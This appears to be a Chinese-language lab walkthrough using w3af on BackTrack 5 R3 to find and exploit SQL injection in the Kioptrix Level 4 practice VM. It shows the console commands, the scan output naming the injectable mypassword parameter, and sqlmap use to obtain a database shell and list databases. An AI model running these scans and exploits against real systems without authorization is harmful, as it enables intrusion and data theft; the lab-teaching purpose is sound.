w3af是一個(gè)
Web應(yīng)用程序攻擊和檢查框架.該項(xiàng)目已超過130個(gè)插件,其中包括檢查網(wǎng)站爬蟲,SQL注入(
SQL Injection),跨站(XSS),本地文件包含(LFI),遠(yuǎn)程文件包含(RFI)等.該項(xiàng)目的目標(biāo)是要建立一個(gè)框架,以尋找和開發(fā)Web應(yīng)用安全漏洞,所以很容易使用和擴(kuò)展.
0×00 概述
在BackTrack5R3下使用w3af測試Kioptrix Level 4的SQL注入漏洞.
0×01 簡介
w3af是一個(gè)Web應(yīng)用程序攻擊和檢查框架.該項(xiàng)目已超過130個(gè)插件,其中包括檢查網(wǎng)站爬蟲,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),遠(yuǎn)程文件包含(RFI)等.該項(xiàng)目的目標(biāo)是要建立一個(gè)框架,以尋找和開發(fā)Web應(yīng)用安全漏洞,所以很容易使用和擴(kuò)展.
0×02 安裝
root@bt:~# apt-get install w3af
0×03 啟動(dòng)
root@bt:~# cd /pentest/web/w3af/root@bt:/pentest/web/w3af# ./w3af_console
0×04 漏洞掃描配置
w3af>>> plugins//進(jìn)入插件模塊w3af/plugins>>> list discovery //列出所有用于發(fā)現(xiàn)的插件w3af/plugins>>> discovery findBackdoor phpinfo webSpider //啟用findBackdoor phpinfo webSpider這三個(gè)插件w3af/plugins>>> list audit //列出所有用于漏洞的插件w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss //啟用blindSqli fileUpload osCommanding sqli xss這五個(gè)插件w3af/plugins>>> back//返回主模塊w3af>>> target//進(jìn)入配置目標(biāo)的模塊w3af/config:target>>>set target http://192.168.244.132///把目標(biāo)設(shè)置為http://192.168.244.132/w3af/config:target>>> back//返回主模塊
0×05 漏洞掃描
w3af>>> start ---New URL found by phpinfo plugin: http://192.168.244.132/New URL found by phpinfo plugin: http://192.168.244.132/checklogin.phpNew URL found by phpinfo plugin: http://192.168.244.132/index.phpNew URL found by webSpider plugin: http://192.168.244.132/New URL found by webSpider plugin: http://192.168.244.132/checklogin.phpNew URL found by webSpider plugin: http://192.168.244.132/index.phpFound 3 URLs and 8 different points of injection.The list of URLs is:- http://192.168.244.132/index.php- http://192.168.244.132/checklogin.php- http://192.168.244.132/The list of fuzzable requests is:- http://192.168.244.132/ | Method: GET- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")- http://192.168.244.132/checklogin.php | Method: GET- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")- http://192.168.244.132/index.php | Method: GET- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.Scan finished in 19 seconds.---//開始掃描 |
0×06 漏洞利用配置
w3af>>> exploit //進(jìn)入漏洞利用模塊w3af/exploit>>> list exploit//列出所有用于漏洞利用的插件w3af/exploit>>> exploit sqlmap //使用sqlmap進(jìn)行SQL注入漏洞的
測試| ---Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...Vulnerability successfully exploited. This is a list of available shells and proxies:- [0] <sqlobject ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )>Please use the interact command to interact with the shell objects.---//測試存在SQL注入漏洞//這里要記住shell objects(這里是0),等一下要用到0x07 漏洞利用w3af/exploit>>> interact 0//interact + shell object就可以利用了---Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shellw3af/exploit/sqlmap-0>>> ---//sqlmap的一個(gè)交互式模塊w3af/exploit/sqlmap-0>>> dbs ---Available databases: [3]:[*] information_schema[*] members[*] mysql---//成功獲得數(shù)據(jù)庫信息 |